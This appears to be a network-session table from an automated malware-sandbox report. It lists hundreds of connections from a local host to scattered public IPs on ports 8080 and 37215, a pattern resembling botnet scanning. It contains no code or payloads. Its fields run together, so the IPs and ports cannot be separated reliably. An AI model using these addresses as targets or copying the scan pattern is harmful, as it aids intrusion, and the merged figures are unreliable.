                                                        17828192.168.2.2338230193.146.106.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17829192.168.2.2343600197.4.218.1738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17830192.168.2.2347764167.129.41.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17831192.168.2.233978865.3.76.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17832192.168.2.235977470.11.250.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17833192.168.2.2342368136.108.221.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17834192.168.2.234204088.21.129.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17835192.168.2.234388245.12.38.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17836192.168.2.2338242109.20.167.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17837192.168.2.2357220205.120.180.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17838192.168.2.2343614100.50.184.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17839192.168.2.2346764191.206.201.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17840192.168.2.233768235.218.244.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17841192.168.2.235497231.91.161.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17842192.168.2.233690045.219.225.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17843192.168.2.2355612211.73.208.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17844192.168.2.2353978148.145.220.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17845192.168.2.235853693.82.158.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17846192.168.2.234637293.188.205.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17847192.168.2.2356706117.200.48.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17848192.168.2.233965813.181.166.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17849192.168.2.2333084131.201.196.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17850192.168.2.2333942102.89.42.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17851192.168.2.2333990154.22.122.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17852192.168.2.2335376160.34.208.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17853192.168.2.2352566197.16.91.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17854192.168.2.2333612110.224.79.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17855192.168.2.2339704212.125.141.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17856192.168.2.2358180204.105.103.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17857192.168.2.233862699.21.159.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17858192.168.2.235799277.66.145.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17859192.168.2.2350276204.65.236.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17860192.168.2.23575762.25.90.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17861192.168.2.2347538125.101.115.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17862192.168.2.235099483.244.173.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17863192.168.2.2358590100.188.206.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17864192.168.2.2355906188.154.235.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17865192.168.2.2337962103.189.63.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17866192.168.2.235153064.60.141.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17867192.168.2.2336108209.156.79.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17868192.168.2.2354238191.226.52.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17869192.168.2.2341774173.145.50.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17870192.168.2.2339302116.29.43.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17871192.168.2.233870087.146.66.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17872192.168.2.2358774197.190.254.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17873192.168.2.234486266.120.9.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17874192.168.2.234639672.102.76.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17875192.168.2.235717837.213.121.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17876192.168.2.2346572122.88.92.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17877192.168.2.235993017.155.143.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17878192.168.2.2354198104.156.212.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17879192.168.2.2334914211.32.113.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17880192.168.2.234451881.63.76.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17881192.168.2.235195443.31.19.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17882192.168.2.2347652190.73.5.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17883192.168.2.235010462.201.133.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17884192.168.2.235481444.135.29.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17885192.168.2.2347040148.233.47.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17886192.168.2.2334538205.80.110.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17887192.168.2.23523001.62.42.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17888192.168.2.2352552124.201.48.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17889192.168.2.235233096.249.30.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17890192.168.2.2340638171.136.237.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17891192.168.2.234413868.84.115.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17892192.168.2.234603871.73.68.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17893192.168.2.233846285.239.67.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17894192.168.2.2344254150.96.177.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17895192.168.2.2335834198.169.21.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17896192.168.2.2347486162.73.78.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17897192.168.2.2345258190.87.138.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17898192.168.2.2359876141.129.232.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17899192.168.2.235426459.143.103.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17900192.168.2.2340050181.254.101.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17901192.168.2.235998031.209.182.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17902192.168.2.2333804151.46.122.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17903192.168.2.233680620.122.1.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17904192.168.2.2354904161.83.253.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17905192.168.2.233625882.194.124.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17906192.168.2.2359628192.63.60.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17907192.168.2.2356210133.99.154.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17908192.168.2.2341476223.222.98.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17909192.168.2.2353528152.2.98.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17910192.168.2.2349302213.151.99.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17911192.168.2.234657044.78.144.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17912192.168.2.2354212151.108.129.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17913192.168.2.2335184115.13.253.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17914192.168.2.23402561.47.179.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17915192.168.2.2352942175.138.255.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17916192.168.2.233815883.83.21.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17917192.168.2.2341888140.192.22.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17918192.168.2.2352362155.219.173.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17919192.168.2.2335186155.53.130.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17920192.168.2.235077632.209.15.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17921192.168.2.2344698170.20.100.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17922192.168.2.234814245.110.226.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17923192.168.2.235769841.239.222.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17924192.168.2.2337834177.44.185.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17925192.168.2.2350822184.180.51.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17926192.168.2.2342432186.210.188.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17927192.168.2.2348496156.77.106.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17928192.168.2.2358998132.229.132.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17929192.168.2.2343060204.55.37.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17930192.168.2.2360660189.177.30.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17931192.168.2.2350634107.230.119.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17932192.168.2.2338858110.128.191.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17933192.168.2.2353842191.107.160.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17934192.168.2.2351496153.170.197.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17935192.168.2.233667687.136.188.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17936192.168.2.235254246.6.12.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17937192.168.2.234334645.46.117.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17938192.168.2.2336996180.170.46.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17939192.168.2.2333986180.77.235.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17940192.168.2.2356968163.160.215.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17941192.168.2.2355530200.99.124.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17942192.168.2.2353378108.23.206.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17943192.168.2.233466837.128.223.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17944192.168.2.235666266.50.102.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17945192.168.2.2360862197.127.122.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17946192.168.2.234072431.121.28.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17947192.168.2.23338585.246.18.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17948192.168.2.234762449.138.79.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17949192.168.2.234761036.83.176.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17950192.168.2.2356716175.56.76.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17951192.168.2.233524498.52.38.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17952192.168.2.233826058.247.252.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17953192.168.2.2359890156.34.32.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17954192.168.2.2342788186.93.242.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17955192.168.2.2354194164.211.137.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17956192.168.2.2333940149.94.2.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17957192.168.2.235413688.201.187.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17958192.168.2.2349302204.190.179.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17959192.168.2.2356308209.159.46.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17960192.168.2.2342380210.124.62.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17961192.168.2.233544836.174.255.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17962192.168.2.23412284.26.30.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17963192.168.2.2358084145.183.18.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17964192.168.2.2345128101.29.169.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17965192.168.2.2335526200.181.75.2298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17966192.168.2.235379262.204.155.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17967192.168.2.2356612128.115.128.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17968192.168.2.235384843.77.13.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17969192.168.2.2359256151.30.218.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17970192.168.2.235465676.60.122.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17971192.168.2.2358736122.120.121.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17972192.168.2.2353538118.248.134.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17973192.168.2.233536071.143.139.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17974192.168.2.2357146176.18.29.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17975192.168.2.2334986151.57.38.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17976192.168.2.235700678.77.215.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17977192.168.2.235444261.248.13.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17978192.168.2.234434663.168.50.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17979192.168.2.2342746138.159.183.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17980192.168.2.235298217.4.206.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17981192.168.2.2349632123.132.2.938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17982192.168.2.2339818186.247.228.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17983192.168.2.2339804120.65.93.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17984192.168.2.2348566198.84.41.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17985192.168.2.2349198116.132.20.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17986192.168.2.2356114128.64.170.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17987192.168.2.233310295.234.220.138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17988192.168.2.235971694.249.167.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17989192.168.2.2353278174.112.141.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17990192.168.2.2360478170.44.237.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17991192.168.2.234923475.144.42.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17992192.168.2.2348996117.4.200.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17993192.168.2.234784677.72.113.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17994192.168.2.2356470177.65.249.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17995192.168.2.2343950145.34.107.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17996192.168.2.235213646.206.154.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17997192.168.2.2346358167.25.100.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17998192.168.2.234224812.95.12.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17999192.168.2.234275023.3.91.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18000192.168.2.235704653.67.45.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18001192.168.2.2355376147.61.102.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18002192.168.2.236051620.231.63.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18003192.168.2.233603241.144.178.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18004192.168.2.2357232157.143.236.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18005192.168.2.2354658145.11.209.10637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18006192.168.2.234885648.220.58.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18007192.168.2.235795841.130.95.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18008192.168.2.235160441.176.205.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18009192.168.2.2345422157.134.136.4037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18010192.168.2.2357082197.90.128.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18011192.168.2.2336812197.235.247.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18012192.168.2.2333812197.176.90.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18013192.168.2.2353878157.92.189.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18014192.168.2.234458841.112.12.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18015192.168.2.2353796157.193.235.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18016192.168.2.234881685.182.214.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18017192.168.2.2335546157.74.105.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18018192.168.2.235295884.107.15.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18019192.168.2.235717280.3.74.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18020192.168.2.2349354179.86.123.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18021192.168.2.2340896219.59.104.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18022192.168.2.234388077.216.47.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18023192.168.2.2342670132.186.170.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18024192.168.2.234589882.33.136.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18025192.168.2.234350497.42.222.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18026192.168.2.235292677.69.192.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18027192.168.2.2349278111.127.184.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18028192.168.2.234180679.73.213.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18029192.168.2.2344462198.163.37.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18030192.168.2.23399601.233.174.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18031192.168.2.234564440.43.146.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18032192.168.2.233862272.168.115.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18033192.168.2.234552897.37.131.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18034192.168.2.2346490123.75.50.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18035192.168.2.235272438.114.82.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18036192.168.2.233452272.116.174.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18037192.168.2.2342422164.178.49.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        18038192.168.2.235562025.113.73.2238080
                                                        TimestampBytes transferredDirectionData


